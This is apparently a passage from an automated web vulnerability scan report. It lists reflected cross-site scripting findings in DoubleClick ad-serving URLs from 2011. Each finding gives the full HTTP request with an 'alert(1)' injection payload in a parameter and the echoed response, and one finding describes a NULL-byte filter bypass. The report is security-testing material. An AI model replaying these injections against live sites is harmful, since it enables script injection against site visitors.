Path:	/adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00159b8"-alert(1)-"2f094396d2c was submitted in the ai parameter. This input was echoed as 159b8"-alert(1)-"2f094396d2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BDKyNGgGGTeW2G87tlQeXo9nTCpWpie8BnfOH8hLjqLazM7DgpQMQARgBIM-2sAM4AFDEwrTWBmDJBqABo67u9gOyAQx3d3cud29vdC5jb226AQk3Mjh4OTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-4AhjAAgXIAuXvxRioAwHRA1-0zbvopV3k6AOzAugD7QL1AwQFAMQ%00159b8"-alert(1)-"2f094396d2c&num=1&sig=AGiWqtwnk5CjmbYfnLHaK27gT0fU3IqnSA&client=ca-pub-2332856072838068&adurl=;ord=1414262516? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2332856072838068&format=728x90_as&output=html&h=90&w=728&lmt=1300645740&channel=Blog728Image&ad_type=text_image&color_bg=FFFFFF&color_border=FFFFFF&color_link=4A6751&color_text=000000&color_url=B35A1E&flash=10.2.154&url=http%3A%2F%2Fwww.woot.com%2FForums%2F&dt=1300627740399&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300627740639&frm=0&adk=453380111&ga_vid=473007276.1300627741&ga_sid=1300627741&ga_hid=602886886&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=916&fu=0&ifi=1&dtd=506&xpc=A6InmP8TQy&p=http%3A//www.woot.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6922
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 20 Mar 2011 13:42:42 GMT
Expires: Sun, 20 Mar 2011 13:42:42 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
9nTCpWpie8BnfOH8hLjqLazM7DgpQMQARgBIM-2sAM4AFDEwrTWBmDJBqABo67u9gOyAQx3d3cud29vdC5jb226AQk3Mjh4OTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-4AhjAAgXIAuXvxRioAwHRA1-0zbvopV3k6AOzAugD7QL1AwQFAMQ%00159b8"-alert(1)-"2f094396d2c&num=1&sig=AGiWqtwnk5CjmbYfnLHaK27gT0fU3IqnSA&client=ca-pub-2332856072838068&adurl=http://ads.networksolutions.com/landing?code=P99C519S512N0B2A1D38E0000V109");
var fscUrl = url;
var fscUrlClickTagFo
...[SNIP]...

1.14. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [client parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c345d"-alert(1)-"12b4a78061b was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BDKyNGgGGTeW2G87tlQeXo9nTCpWpie8BnfOH8hLjqLazM7DgpQMQARgBIM-2sAM4AFDEwrTWBmDJBqABo67u9gOyAQx3d3cud29vdC5jb226AQk3Mjh4OTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-4AhjAAgXIAuXvxRioAwHRA1-0zbvopV3k6AOzAugD7QL1AwQFAMQ&num=1&sig=AGiWqtwnk5CjmbYfnLHaK27gT0fU3IqnSA&client=ca-pub-2332856072838068c345d"-alert(1)-"12b4a78061b&adurl=;ord=1414262516? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2332856072838068&format=728x90_as&output=html&h=90&w=728&lmt=1300645740&channel=Blog728Image&ad_type=text_image&color_bg=FFFFFF&color_border=FFFFFF&color_link=4A6751&color_text=000000&color_url=B35A1E&flash=10.2.154&url=http%3A%2F%2Fwww.woot.com%2FForums%2F&dt=1300627740399&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300627740639&frm=0&adk=453380111&ga_vid=473007276.1300627741&ga_sid=1300627741&ga_hid=602886886&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=916&fu=0&ifi=1&dtd=506&xpc=A6InmP8TQy&p=http%3A//www.woot.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 20 Mar 2011 13:44:16 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 13:44:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6971

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
cud29vdC5jb226AQk3Mjh4OTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-4AhjAAgXIAuXvxRioAwHRA1-0zbvopV3k6AOzAugD7QL1AwQFAMQ&num=1&sig=AGiWqtwnk5CjmbYfnLHaK27gT0fU3IqnSA&client=ca-pub-2332856072838068c345d"-alert(1)-"12b4a78061b&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP61C519S512N0B2A1D573E0000V102%26promo%3DHOSTING599");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg
...[SNIP]...

1.15. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [num parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c98e0"-alert(1)-"440586ca37e was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BDKyNGgGGTeW2G87tlQeXo9nTCpWpie8BnfOH8hLjqLazM7DgpQMQARgBIM-2sAM4AFDEwrTWBmDJBqABo67u9gOyAQx3d3cud29vdC5jb226AQk3Mjh4OTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-4AhjAAgXIAuXvxRioAwHRA1-0zbvopV3k6AOzAugD7QL1AwQFAMQ&num=1c98e0"-alert(1)-"440586ca37e&sig=AGiWqtwnk5CjmbYfnLHaK27gT0fU3IqnSA&client=ca-pub-2332856072838068&adurl=;ord=1414262516? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2332856072838068&format=728x90_as&output=html&h=90&w=728&lmt=1300645740&channel=Blog728Image&ad_type=text_image&color_bg=FFFFFF&color_border=FFFFFF&color_link=4A6751&color_text=000000&color_url=B35A1E&flash=10.2.154&url=http%3A%2F%2Fwww.woot.com%2FForums%2F&dt=1300627740399&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300627740639&frm=0&adk=453380111&ga_vid=473007276.1300627741&ga_sid=1300627741&ga_hid=602886886&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=916&fu=0&ifi=1&dtd=506&xpc=A6InmP8TQy&p=http%3A//www.woot.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 20 Mar 2011 13:42:54 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 13:42:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6971

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
CpWpie8BnfOH8hLjqLazM7DgpQMQARgBIM-2sAM4AFDEwrTWBmDJBqABo67u9gOyAQx3d3cud29vdC5jb226AQk3Mjh4OTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-4AhjAAgXIAuXvxRioAwHRA1-0zbvopV3k6AOzAugD7QL1AwQFAMQ&num=1c98e0"-alert(1)-"440586ca37e&sig=AGiWqtwnk5CjmbYfnLHaK27gT0fU3IqnSA&client=ca-pub-2332856072838068&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP61C519S512N0B2A1D573E0000V102%26promo%3DHOSTING599");
var fscUrl =
...[SNIP]...

1.16. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [sig parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18dbe"-alert(1)-"73bd009ca0d was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BDKyNGgGGTeW2G87tlQeXo9nTCpWpie8BnfOH8hLjqLazM7DgpQMQARgBIM-2sAM4AFDEwrTWBmDJBqABo67u9gOyAQx3d3cud29vdC5jb226AQk3Mjh4OTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-4AhjAAgXIAuXvxRioAwHRA1-0zbvopV3k6AOzAugD7QL1AwQFAMQ&num=1&sig=AGiWqtwnk5CjmbYfnLHaK27gT0fU3IqnSA18dbe"-alert(1)-"73bd009ca0d&client=ca-pub-2332856072838068&adurl=;ord=1414262516? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2332856072838068&format=728x90_as&output=html&h=90&w=728&lmt=1300645740&channel=Blog728Image&ad_type=text_image&color_bg=FFFFFF&color_border=FFFFFF&color_link=4A6751&color_text=000000&color_url=B35A1E&flash=10.2.154&url=http%3A%2F%2Fwww.woot.com%2FForums%2F&dt=1300627740399&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300627740639&frm=0&adk=453380111&ga_vid=473007276.1300627741&ga_sid=1300627741&ga_hid=602886886&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=916&fu=0&ifi=1&dtd=506&xpc=A6InmP8TQy&p=http%3A//www.woot.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 20 Mar 2011 13:43:30 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 13:43:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6976

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
4AFDEwrTWBmDJBqABo67u9gOyAQx3d3cud29vdC5jb226AQk3Mjh4OTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-4AhjAAgXIAuXvxRioAwHRA1-0zbvopV3k6AOzAugD7QL1AwQFAMQ&num=1&sig=AGiWqtwnk5CjmbYfnLHaK27gT0fU3IqnSA18dbe"-alert(1)-"73bd009ca0d&client=ca-pub-2332856072838068&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP111C519S512N0B2A1D688E0000V101%26promo%3DBCXXX04226");
var fscUrl = url;
var fscUrlClickTagFound = false;
...[SNIP]...

1.17. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1b91"-alert(1)-"005962dd2ca was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=la1b91"-alert(1)-"005962dd2ca&ai=BDKyNGgGGTeW2G87tlQeXo9nTCpWpie8BnfOH8hLjqLazM7DgpQMQARgBIM-2sAM4AFDEwrTWBmDJBqABo67u9gOyAQx3d3cud29vdC5jb226AQk3Mjh4OTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-4AhjAAgXIAuXvxRioAwHRA1-0zbvopV3k6AOzAugD7QL1AwQFAMQ&num=1&sig=AGiWqtwnk5CjmbYfnLHaK27gT0fU3IqnSA&client=ca-pub-2332856072838068&adurl=;ord=1414262516? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2332856072838068&format=728x90_as&output=html&h=90&w=728&lmt=1300645740&channel=Blog728Image&ad_type=text_image&color_bg=FFFFFF&color_border=FFFFFF&color_link=4A6751&color_text=000000&color_url=B35A1E&flash=10.2.154&url=http%3A%2F%2Fwww.woot.com%2FForums%2F&dt=1300627740399&bpp=3&shv=r20110315&jsv=r20110317&correlator=1300627740639&frm=0&adk=453380111&ga_vid=473007276.1300627741&ga_sid=1300627741&ga_hid=602886886&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=916&fu=0&ifi=1&dtd=506&xpc=A6InmP8TQy&p=http%3A//www.woot.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 20 Mar 2011 13:42:26 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 13:42:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6906

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/f/17b/%2a/m%3B234427573%3B0-0%3B0%3B50265527%3B3454-728/90%3B38432219/38449976/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=la1b91"-alert(1)-"005962dd2ca&ai=BDKyNGgGGTeW2G87tlQeXo9nTCpWpie8BnfOH8hLjqLazM7DgpQMQARgBIM-2sAM4AFDEwrTWBmDJBqABo67u9gOyAQx3d3cud29vdC5jb226AQk3Mjh4OTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-4AhjAAgXIAuXvxRioAwHRA1-0zbvo
...[SNIP]...

1.18. http://ad.doubleclick.net/adj/N3880.adwords.google.com/B5109627.9 [adurl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.adwords.google.com/B5109627.9

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe4cc"-alert(1)-"7f17fb6c423 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.adwords.google.com/B5109627.9;dcove=o;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BeUAfGgGGTenHFsfOlQeE-o3pDun1-pYCkd_lxR-5zZWPRAAQARgBIM-2sAM4AGDJBrIBDHd3dy53b290LmNvbboBCjMwMHgyNTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-YAswhuAIYwAIByALp8KEa4AIA6gIXd29vdC1jb21tdW5pdHkxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA7MC6APtAvUDBAUAxOAEAQ&num=1&sig=AGiWqtxxObGMGdGDDOWnMdJXAptYdjLF1g&client=ca-pub-2332856072838068&adurl=fe4cc"-alert(1)-"7f17fb6c423 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 37329
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 20 Mar 2011 13:45:17 GMT
Expires: Sun, 20 Mar 2011 13:45:17 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
cnVtcy-YAswhuAIYwAIByALp8KEa4AIA6gIXd29vdC1jb21tdW5pdHkxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA7MC6APtAvUDBAUAxOAEAQ&num=1&sig=AGiWqtxxObGMGdGDDOWnMdJXAptYdjLF1g&client=ca-pub-2332856072838068&adurl=fe4cc"-alert(1)-"7f17fb6c423";
this.clickN = "";
this.type = type;
this.uniqueId = plcrInfo_1295621207939.uniqueId;
this.thirdPartyImpUrl = "";
this.
...[SNIP]...

1.19. http://ad.doubleclick.net/adj/N3880.adwords.google.com/B5109627.9 [adurl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.adwords.google.com/B5109627.9

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb9fd'-alert(1)-'bddf0dc8ce was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.adwords.google.com/B5109627.9;dcove=o;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BeUAfGgGGTenHFsfOlQeE-o3pDun1-pYCkd_lxR-5zZWPRAAQARgBIM-2sAM4AGDJBrIBDHd3dy53b290LmNvbboBCjMwMHgyNTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-YAswhuAIYwAIByALp8KEa4AIA6gIXd29vdC1jb21tdW5pdHkxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA7MC6APtAvUDBAUAxOAEAQ&num=1&sig=AGiWqtxxObGMGdGDDOWnMdJXAptYdjLF1g&client=ca-pub-2332856072838068&adurl=eb9fd'-alert(1)-'bddf0dc8ce HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 37322
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 20 Mar 2011 13:45:22 GMT
Expires: Sun, 20 Mar 2011 13:45:22 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
cnVtcy-YAswhuAIYwAIByALp8KEa4AIA6gIXd29vdC1jb21tdW5pdHkxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA7MC6APtAvUDBAUAxOAEAQ&num=1&sig=AGiWqtxxObGMGdGDDOWnMdJXAptYdjLF1g&client=ca-pub-2332856072838068&adurl=eb9fd'-alert(1)-'bddf0dc8cehttp://www.chevrolet.com/volt/">
...[SNIP]...

1.20. http://ad.doubleclick.net/adj/N3880.adwords.google.com/B5109627.9 [ai parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.adwords.google.com/B5109627.9

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26a5b'-alert(1)-'69524fa3f84 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.adwords.google.com/B5109627.9;dcove=o;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BeUAfGgGGTenHFsfOlQeE-o3pDun1-pYCkd_lxR-5zZWPRAAQARgBIM-2sAM4AGDJBrIBDHd3dy53b290LmNvbboBCjMwMHgyNTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-YAswhuAIYwAIByALp8KEa4AIA6gIXd29vdC1jb21tdW5pdHkxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA7MC6APtAvUDBAUAxOAEAQ26a5b'-alert(1)-'69524fa3f84&num=1&sig=AGiWqtxxObGMGdGDDOWnMdJXAptYdjLF1g&client=ca-pub-2332856072838068&adurl=;ord=1302051679? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 13:42:46 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 13:42:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37329

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
AM4AGDJBrIBDHd3dy53b290LmNvbboBCjMwMHgyNTBfYXPIAQnaARtodHRwOi8vd3d3Lndvb3QuY29tL0ZvcnVtcy-YAswhuAIYwAIByALp8KEa4AIA6gIXd29vdC1jb21tdW5pdHkxLTMwMHgyNTCQA6QDmAOkA6gDAdEDX7TNu-ilXeToA7MC6APtAvUDBAUAxOAEAQ26a5b'-alert(1)-'69524fa3f84&num=1&sig=AGiWqtxxObGMGdGDDOWnMdJXAptYdjLF1g&client=ca-pub-2332856072838068&adurl=http://www.chevrolet.com/volt/">
...[SNIP]...

1.21. http://ad.doubleclick.net/adj/N3880.adwords.google.com/B5109627.9 [ai parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.adwords.google.com/B5109627.9

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f06e"-alert(1)-"09b49dad07e was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

